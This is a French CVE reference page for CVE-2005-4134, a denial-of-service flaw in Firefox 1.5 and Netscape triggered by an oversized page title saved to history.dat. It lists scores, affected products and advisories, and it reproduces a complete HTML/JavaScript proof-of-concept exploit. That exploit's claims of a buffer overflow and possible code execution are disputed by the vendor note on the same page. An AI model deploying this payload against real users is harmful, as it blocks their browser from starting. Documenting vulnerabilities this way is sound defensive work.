CVE-2005-4134 : Détail

CVE-2005-4134

94.9%V3
Network
2005-12-09
14h00 +00:00
2018-10-19
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mozilla Firefox 1.5, Netscape 8.0.4 and 7.2, and K-Meleon before 0.9.12 allows remote attackers to cause a denial of service (CPU consumption and delayed application startup) via a web site with a large title, which is recorded in history.dat but not processed efficiently during startup. NOTE: despite initial reports, the Mozilla vendor does not believe that this issue can be used to trigger a crash or buffer overflow in Firefox. Also, it has been independently reported that Netscape 8.1 does not have this issue.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 26762

Date de publication : 2005-12-07 23h00 +00:00
Auteur : ZIPLOCK
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/15773/info Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability. This issue presents itself when the browser handles a large entry in the 'history.dat' file. An attacker may trigger this issue by enticing a user to visit a malicious website and by supplying excessive data to be stored in the affected file. This may cause a denial-of-service condition. **UPDATE: Proof-of-concept exploit code has been published. The author of the code attributes the crash to a buffer-overflow condition. Symantec has not reproduced the alleged flaw. <!-- Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file -- which most users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2. ZIPLOCK <sickbeatz@gmail.com> --> <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html>

Products Mentioned

Configuraton 0

K-meleon_project>>K-meleon >> Version To (including) 0.9

K-meleon_project>>K-meleon >> Version 0.7

K-meleon_project>>K-meleon >> Version 0.7_service_pack_1

    K-meleon_project>>K-meleon >> Version 0.8

    K-meleon_project>>K-meleon >> Version 0.8.1

    K-meleon_project>>K-meleon >> Version 0.8.2

    Mozilla>>Firefox >> Version To (including) 1.5

    Mozilla>>Mozilla_suite >> Version To (including) 1.7.12

    Netscape>>Navigator >> Version To (including) 8.0.40

    Netscape>>Navigator >> Version 7.1

    Netscape>>Navigator >> Version 7.2

    Références

    http://www.mandriva.com/security/advisories?name=MDKSA-2006:036
    Tags : vendor-advisory, x_refsource_MANDRIVA
    https://usn.ubuntu.com/275-1/
    Tags : vendor-advisory, x_refsource_UBUNTU
    http://secunia.com/advisories/19902
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.osvdb.org/21533
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.mandriva.com/security/advisories?name=MDKSA-2006:037
    Tags : vendor-advisory, x_refsource_MANDRIVA
    http://secunia.com/advisories/17944
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19941
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/17946
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://marc.info/?l=full-disclosure&m=113405896025702&w=2
    Tags : mailing-list, x_refsource_FULLDISC
    http://www.gentoo.org/security/en/glsa/glsa-200604-12.xml
    Tags : vendor-advisory, x_refsource_GENTOO
    http://secunia.com/advisories/21622
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19862
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19230
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/18704
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.debian.org/security/2006/dsa-1051
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://secunia.com/advisories/18709
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://usn.ubuntu.com/271-1/
    Tags : vendor-advisory, x_refsource_UBUNTU
    http://secunia.com/advisories/18705
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.gentoo.org/security/en/glsa/glsa-200604-18.xml
    Tags : vendor-advisory, x_refsource_GENTOO
    http://www.securityfocus.com/bid/16476
    Tags : vdb-entry, x_refsource_BID
    http://www.vupen.com/english/advisories/2006/0413
    Tags : vdb-entry, x_refsource_VUPEN
    http://securitytracker.com/id?1015328
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/19746
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/21033
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/18700
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://sunsolve.sun.com/search/document.do?assetkey=1-26-102550-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://secunia.com/advisories/19759
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.redhat.com/support/errata/RHSA-2006-0200.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://secunia.com/advisories/18706
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/17934
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/15773
    Tags : vdb-entry, x_refsource_BID
    http://www.redhat.com/support/errata/RHSA-2006-0199.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://secunia.com/advisories/19863
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/archive/1/425978/100/0/threaded
    Tags : vendor-advisory, x_refsource_FEDORA
    http://secunia.com/advisories/18708
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2005/2805
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/archive/1/425975/100/0/threaded
    Tags : vendor-advisory, x_refsource_FEDORA
    http://marc.info/?l=full-disclosure&m=113404911919629&w=2
    Tags : mailing-list, x_refsource_FULLDISC
    http://sunsolve.sun.com/search/document.do?assetkey=1-26-228526-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://secunia.com/advisories/19852
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2006/3391
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.debian.org/security/2006/dsa-1046
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://www.debian.org/security/2006/dsa-1044
    Tags : vendor-advisory, x_refsource_DEBIAN